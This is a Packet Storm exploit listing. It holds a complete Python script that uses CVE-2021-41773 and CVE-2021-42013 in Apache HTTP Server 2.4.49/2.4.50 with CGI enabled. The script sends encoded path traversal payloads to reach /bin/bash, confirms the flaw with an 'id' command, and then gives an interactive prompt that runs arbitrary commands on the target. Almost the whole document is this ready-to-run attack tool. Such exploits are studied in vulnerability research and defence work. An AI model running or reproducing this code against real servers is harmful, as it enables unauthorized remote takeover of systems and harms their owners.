Lucene search

K
packetstormValentin LobsteinPACKETSTORM:164941
HistoryNov 11, 2021 - 12:00 a.m.

Apache HTTP Server 2.4.50 Remote Code Execution

2021-11-1100:00:00
Valentin Lobstein
packetstormsecurity.com
1046
`# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)  
# Date: 11/11/2021  
# Exploit Author: Valentin Lobstein  
# Vendor Homepage: https://apache.org/  
# Software Link: https://github.com/Balgogan/CVE-2021-41773  
# Version: Apache 2.4.49/2.4.50 (CGI enabled)  
# Tested on: Debian GNU/Linux  
# CVE : CVE-2021-41773 / CVE-2021-42013  
# Credits : Lucas Schnell  
  
  
#!/usr/bin/env python3  
#coding: utf-8  
  
import os  
import re  
import sys  
import time  
import requests  
from colorama import Fore,Style  
  
  
header = '''\033[1;91m  
  
β–„β–„β–„ β–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆ β–„β–„β–„ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   
β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆ β–€ β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–“β–ˆ β–€   
β–’β–ˆβ–ˆ β–€β–ˆβ–„ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–’β–’β–ˆβ–ˆ β–€β–ˆβ–„ β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆβ–ˆ   
β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆ β–’β–ˆβ–ˆβ–„β–ˆβ–“β–’ β–’β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆ β–’β–“β–“β–„ β–„β–ˆβ–ˆβ–’β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–“β–„ β–„β–ˆβ–ˆβ–’β–’β–“β–ˆ β–„   
β–“β–ˆ β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–’ β–‘ β–‘ β–“β–ˆ β–“β–ˆβ–ˆβ–’β–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–‘β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’ β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–’β–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–‘β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’  
β–’β–’ β–“β–’β–ˆβ–‘β–’β–“β–’β–‘ β–‘ β–‘ β–’β–’ β–“β–’β–ˆβ–‘β–‘ β–‘β–’ β–’ β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘ β–‘ β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–‘β–’ β–’ β–‘β–‘β–‘ β–’β–‘ β–‘  
β–’ β–’β–’ β–‘β–‘β–’ β–‘ β–’ β–’β–’ β–‘ β–‘ β–’ β–’ β–‘β–’β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–’ β–‘ β–’β–‘ β–‘ β–’ β–‘ β–‘ β–‘  
β–‘ β–’ β–‘β–‘ β–‘ β–’ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘   
''' + Style.RESET_ALL  
  
  
if len(sys.argv) < 2 :  
print( 'Use: python3 file.py ip:port ' )  
sys.exit()  
  
def end():  
print("\t\033[1;91m[!] Bye bye !")  
time.sleep(0.5)  
sys.exit(1)  
  
def commands(url,command,session):  
directory = mute_command(url,'pwd')  
user = mute_command(url,'whoami')  
hostname = mute_command(url,'hostname')  
advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')  
command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")   
command = f"echo; {command};"  
req = requests.Request('POST', url=url, data=command)  
prepare = req.prepare()  
prepare.url = url   
response = session.send(prepare, timeout=5)  
output = response.text  
print(output)  
if 'clear' in command:  
os.system('/usr/bin/clear')  
print(header)  
if 'exit' in command:  
end()  
  
def mute_command(url,command):  
session = requests.Session()  
req = requests.Request('POST', url=url, data=f"echo; {command}")  
prepare = req.prepare()  
prepare.url = url   
response = session.send(prepare, timeout=5)  
return response.text.strip()  
  
  
def exploitRCE(payload):  
s = requests.Session()  
try:  
host = sys.argv[1]  
if 'http' not in host:  
url = 'http://'+ host + payload  
else:  
url = host + payload   
session = requests.Session()  
command = "echo; id"  
req = requests.Request('POST', url=url, data=command)  
prepare = req.prepare()  
prepare.url = url   
response = session.send(prepare, timeout=5)  
output = response.text  
if "uid" in output:  
choice = "Y"  
print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)  
print("[!] Sortie:\n\n" + Fore.YELLOW + output )  
choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")  
if choice.lower() in ['','y','yes']:  
while True:  
commands(url,command,session)   
else:  
end()   
else :  
print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)  
except KeyboardInterrupt:  
end()  
  
def main():  
try:  
apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'  
apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'  
payloads = [apache2449_payload,apache2450_payload]  
choice = len(payloads) + 1  
print(header)  
print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")  
while choice >= len(payloads) and choice >= 0:  
choice = int(input('[~] Choice : '))  
if choice < len(payloads):  
exploitRCE(payloads[choice])  
except KeyboardInterrupt:  
print("\n\033[1;91m[!] Bye bye !")  
time.sleep(0.5)  
sys.exit(1)  
  
if __name__ == '__main__':  
main()  
  
`